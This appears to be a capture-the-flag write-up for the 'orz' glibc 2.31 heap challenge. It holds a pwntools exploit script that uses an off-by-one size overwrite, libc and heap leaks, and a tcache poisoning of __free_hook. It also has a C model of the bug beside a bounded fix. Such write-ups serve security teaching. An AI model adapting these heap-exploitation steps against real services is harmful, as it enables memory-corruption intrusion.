```
fuzz@fuzz-virtual-machine:~/pwnpwnpwn/Libc2.31Training/midpwn$ checksec orz
[*] '/home/fuzz/pwnpwnpwn/Libc2.31Training/midpwn/orz'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
```
Basic function modules

A typical menu challenge:
```c
int menu() {
    puts("1. add new note.");
    puts("2. edit a note.");
    puts("3. show a note.");
    puts("4. delte a note.");
    puts("5. exit .");
    return puts("Your choose which one?");
}
```
```python
from pwn import *

# The writeup does not show how io and libc are set up; the two lines below
# are assumed. The binary name comes from the checksec output above and the
# libc is the 2.31-0ubuntu9.7 build fetched with glibc-all-in-one (path assumed).
io = process('./orz')
libc = ELF('./libc-2.31.so')


def add(size, content):
    # menu option 1: allocate a note of `size` bytes and write `content` into it
    io.sendlineafter(b"Your choose which one?\n", b"1")
    io.sendlineafter(b"please input note size : ", str(size).encode())
    io.sendafter(b"please input your note.\n", content)


def edit(idx, content):
    # menu option 2: overwrite note `idx` with `content`
    io.sendlineafter(b"Your choose which one?\n", b"2")
    io.sendlineafter(b"please input note index.\n", str(idx).encode())
    io.sendafter(b"please input new note.\n", content)


def show(idx):
    # menu option 3: print note `idx`
    io.sendlineafter(b"Your choose which one?\n", b"3")
    io.sendlineafter(b"please input note index.\n", str(idx).encode())


def free(idx):
    # menu option 4: delete note `idx`
    io.sendlineafter(b"Your choose which one?\n", b"4")
    io.sendlineafter(b"please input note index.\n", str(idx).encode())
```
```python
def exp():
    # fill the 0xc1 tcache bin (7 entries) so the next free of that size
    # falls through to the unsorted bin instead of tcache
    for i in range(7):
        add(0xb0, b'aaaa')
    for i in range(7):
        free(i)

    # off-by-one to leak libc_base: the extra byte written by edit() lands on
    # the size field of the next chunk and turns it into 0xc1
    for i in range(6):
        add(0x28, b'aaaa')            # 0-5
    edit(0, b'b' * 0x28 + b'\xc1')
    free(1)                           # enlarged chunk goes to the unsorted bin
    add(0x28, b'flag\x00')            # 1 (split from the unsorted chunk)
    show(2)                           # remainder's fd points into main_arena
    libc_base = (u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
                 - 96 - 0x10 - libc.sym['__malloc_hook'])
    log.success("libc_base====>" + hex(libc_base))
    free_hook = libc_base + libc.sym['__free_hook']

    # overlapping chunks to leak heap_base
    for i in range(3):
        add(0x28, b'cccc')            # 6-8 <==> 2-4
    free(2)
    free(3)
    show(7)
    # page-align the leaked tcache pointer, then step back to the heap start
    heap_base = (u64(io.recv(8)) & 0xfffffffff000) - 0x2000

    # hijack __free_hook
    edit(7, p64(free_hook) + b'\x0a')
    log.success("heap_base====>" + hex(heap_base))
    magic = libc_base + 0x1518B0
    add(0x28, b'dddd')                # 2
    add(0x28, p64(magic))             # 3
```
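The writeup never shows the program's edit routine, only that `edit(0, b'b'*0x28 + b'\xc1')` changes the size byte of the neighbouring chunk. As an added illustration (my code, not the challenge binary's), here is a toy model of that bug class: an edit loop whose `<=` bound accepts one byte more than the 0x28-byte note holds, beside the bounded version that leaves the adjacent size field untouched. The `note_pair` layout, the 0x31 starting size and the 0x29-byte input are all constructed for the demo; the result assumes a little-endian machine.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>
#include <stdint.h>

/* Constructed model of two adjacent heap chunks: a 0x28-byte note body
 * followed directly by the size field of the next chunk (as on a glibc
 * heap, where user data runs right up to the neighbour's size word). */
struct note_pair {
    char data[0x28];
    uint64_t next_size;   /* size field of the neighbouring chunk */
};

/* Off-by-one edit: `<=` lets index 0x28 through, so a 0x29-byte input
 * writes one byte into next_size. Returns the number of bytes written. */
size_t edit_note_offbyone(struct note_pair *np, const unsigned char *in, size_t in_len)
{
    unsigned char *dst = (unsigned char *)np;   /* byte view of the whole object */
    size_t i;
    for (i = 0; i <= sizeof np->data && i < in_len; i++)   /* bug: <= instead of < */
        dst[i] = in[i];
    return i;
}

/* Bounded edit: never copies more than the note body can hold. */
size_t edit_note_bounded(struct note_pair *np, const unsigned char *in, size_t in_len)
{
    size_t n = in_len < sizeof np->data ? in_len : sizeof np->data;
    memcpy(np->data, in, n);
    return n;
}

/* Runs one edit routine on a fresh pair with 0x28 bytes of 'b' followed by
 * 0xc1 (the same input shape as the exploit's edit(0, ...)) and returns the
 * neighbour's size field afterwards, so the two routines can be compared. */
uint64_t next_size_after_edit(size_t (*edit)(struct note_pair *, const unsigned char *, size_t))
{
    struct note_pair np;
    unsigned char input[0x29];

    memset(&np, 0, sizeof np);
    np.next_size = 0x31;              /* constructed: an in-use 0x30-byte chunk */
    memset(input, 'b', 0x28);
    input[0x28] = 0xc1;

    edit(&np, input, sizeof input);
    return np.next_size;
}

int main(void)
{
    printf("off-by-one edit: next chunk size 0x31 -> 0x%llx\n",
           (unsigned long long)next_size_after_edit(edit_note_offbyone));
    printf("bounded edit:    next chunk size 0x31 -> 0x%llx\n",
           (unsigned long long)next_size_after_edit(edit_note_bounded));
    return 0;
}
```

The bounded version is the whole fix: clamp the copy length to the buffer before writing, and the neighbouring chunk's metadata stays out of reach no matter what the client sends.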
```
fuzz@fuzz-virtual-machine:/glibc-all-in-one$ sudo python3 update_list
[+] Common list has been save to "list"
[+] Old-release list has been save to "old_list"
fuzz@fuzz-virtual-machine:/glibc-all-in-one$ sudo ./download 2.31-0ubuntu9.7_amd64
fuzz@fuzz-virtual-machine:/glibc-all-in-one$ cd libs/
fuzz@fuzz-virtual-machine:/glibc-all-in-one/libs$ ls
2.31-0ubuntu9.7_amd64
fuzz@fuzz-virtual-machine:/glibc-all-in-one/libs$ cd 2.31-0ubuntu9.7_amd64
```